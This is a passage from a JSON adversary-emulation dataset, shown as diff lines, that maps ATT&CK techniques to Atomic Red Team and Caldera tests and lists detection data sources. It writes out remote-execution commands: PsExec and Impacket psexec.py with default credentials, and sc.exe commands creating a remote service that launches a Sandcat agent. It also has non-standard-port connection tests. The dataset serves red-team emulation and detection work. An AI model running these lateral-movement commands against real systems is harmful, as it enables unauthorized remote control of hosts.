calc.exe on a remote endpoint (default:localhost).\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "localhost" + }, + "user_name": { + 
"description": "Username", + "type": "String", + "default": "DOMAIN\\Administrator" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "psexec_exe": { + "description": "Path to PsExec", + "type": "String", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})\n", + "prereq_command": "if (Test-Path \"#{psexec_exe}\") { exit 0} else { exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_exe}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_exe}\" -Force\n" + } + ], + "executor": { + "command": "#{psexec_exe} \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "name": "command_prompt" + } + }, + { + "name": "psexec.py (Impacket)", + "auto_generated_guid": "edbcd8c9-3639-4844-afad-455c91e95a35", + "description": "Will execute a command on the remote host with Impacket psexec.py script.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "127.0.0.1" + }, + "username": { + "description": "Username", + "type": "String", + "default": "Administrator" + }, + "domain": { + "description": "Target domain", + "type": "String", + "default": "" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "command": { + "description": "Command to execute in target computer", + "type": "String", + "default": "whoami" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "psexec.py (Impacket)\n", 
+ "prereq_command": "if [ -x \"$(command -v psexec.py)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo pip3 install impacket\n" + } + ], + "executor": { + "command": "psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' '#{command}'\n", + "name": "bash" + } + } + ] + }, + { + "id": "95727b87-175c-4a69-8c7a-a5d82746a753", + "name": "Service Creation", + "description": "Create a service named \"sandsvc\" to execute remote 54ndc57 binary named \"s4ndc4t.exe\"", + "tactic": "execution", + "technique": { + "attack_id": "T1569.002", + "name": "System Services: Service Execution" + }, + "platforms": { + "windows": { + "psh": { + "timeout": 300, + "cleanup": "sc.exe \\\\#{remote.host.fqdn} stop sandsvc;\nsc.exe \\\\#{remote.host.fqdn} delete sandsvc /f;\ntaskkill /s \\\\#{remote.host.fqdn} /FI \"Imagename eq s4ndc4t.exe\"\n", + "command": "sc.exe \\\\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= \"cmd /c start C:\\Users\\Public\\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}\" displayname= \"Sandcat Execution\";\nsc.exe \\\\#{remote.host.fqdn} start sandsvc;\nStart-Sleep -s 15;\nGet-Process -ComputerName #{remote.host.fqdn} s4ndc4t;\n" + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": 
"command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run 
in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", 
+ "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1571", + "command_list": [ + "Test-NetConnection -ComputerName #{domain} -port 8081\n", + "Test-NetConnection -ComputerName google.com -port #{port}\n", + "telnet #{domain} 8081\n", + "telnet google.com #{port}\n" + ], + "commands": [ + { + "command": "Test-NetConnection -ComputerName #{domain} -port 8081\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + }, + { + "command": "Test-NetConnection -ComputerName google.com -port #{port}\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + }, + { + "command": "telnet #{domain} 8081\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + }, + { + "command": "telnet google.com #{port}\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1571", + "display_name": "Non-Standard Port", + "atomic_tests": [ + { + "name": "Testing usage of uncommonly used port with PowerShell", + "auto_generated_guid": "21fe622f-8e53-4b31-ba83-6d333c2583f4", + "description": "Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. 
Upon execution, details about the successful\nport check will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "port": { + "description": "Specify uncommon port number", + "type": "String", + "default": "8081" + }, + "domain": { + "description": "Specify target hostname", + "type": "String", + "default": "google.com" + } + }, + "executor": { + "command": "Test-NetConnection -ComputerName #{domain} -port #{port}\n", + "name": "powershell" + } + }, + { + "name": "Testing usage of uncommonly used port", + "auto_generated_guid": "5db21e1d-dd9c-4a50-b885-b1e748912767", + "description": "Testing uncommonly used port utilizing telnet.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "port": { + "description": "Specify uncommon port number", + "type": "String", + "default": "8081" + }, + "domain": { + "description": "Specify target hostname", + "type": "String", + "default": "google.com" + } + }, + "executor": { + "command": "telnet #{domain} #{port}\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
